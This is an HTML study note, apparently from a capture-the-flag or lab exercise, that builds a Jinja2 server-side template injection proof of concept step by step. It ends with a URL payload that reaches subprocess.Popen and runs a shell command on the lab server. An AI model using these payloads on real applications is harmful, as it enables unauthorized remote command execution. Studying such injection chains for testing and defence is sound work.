<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>POC Jinja</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>POC Jinja</h1>

      <div class="ck-content">
        <h3>The basic syntax of templates</h3>

        <p>The official document introduces the syntax of the template as follows</p><pre><code class="language-text-plain">{% ... %} for Statements

{{ ... }} for Expressions to print to the template output

{# ... #} for Comments not included in the template output

#  ... ## for Line Statements
</code></pre>

        <p><strong>Crafting a proof of concept (Jinja2)</strong>

        </p>
        <p>Python allows us to call the current class instance with <a href="https://docs.python.org/release/2.6.4/library/stdtypes.html#instance.__class__">.__class__</a>,
          we can call this on an empty string:</p>
        <p>Payload: <code>http://MACHINE_IP:5000/profile/{{ ''.__class__ }}</code>.</p>
        <p>Classes in Python have an attribute called <a href="https://docs.python.org/release/2.6.4/library/stdtypes.html#class.__mro__">.__mro__</a> that
          allows us to climb up the inherited object tree:</p>
        <p>Payload: <code>http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__ }}</code>.</p>
        <p>Since we want the root object, we can access the second property (first
          index):</p>
        <p>Payload: <code>http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1] }}</code>.</p>
        <p>Objects in Python have a method called <a href="https://docs.python.org/release/2.6.4/library/stdtypes.html#class.__subclasses__">.__subclassess__</a> that
          allows us to climb down the object tree:</p>
        <p>Payload: <code>http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}</code>.</p>
        <p>Now we need to find an object that allows us to run shell commands. Doing
          a Ctrl-F for the modules in the code above yields us a match:</p>
        <figure
        class="image">
          <img src="POC%20Jinja/ChOoCyq.png" />
          </figure>
          <p> </p>
          <p>As this whole output is just a Python list, we can access this by using
            its index. You can find this by either trial and error, or by counting
            its position in the list.</p>
          <p>In this example, the position in the list is 400 (index 401):</p>
          <p>Payload: <code>http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401] }}</code>.</p>
          <p>The above payload essentially calls the <strong>subprocess.Popen</strong> method,
            now all we have to do is invoke it (use the code above for the syntax)
            <br
            /> </p>
          <p>Payload: <code>http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}</code>

          </p>
      </div>
    </div>
  </body>

</html>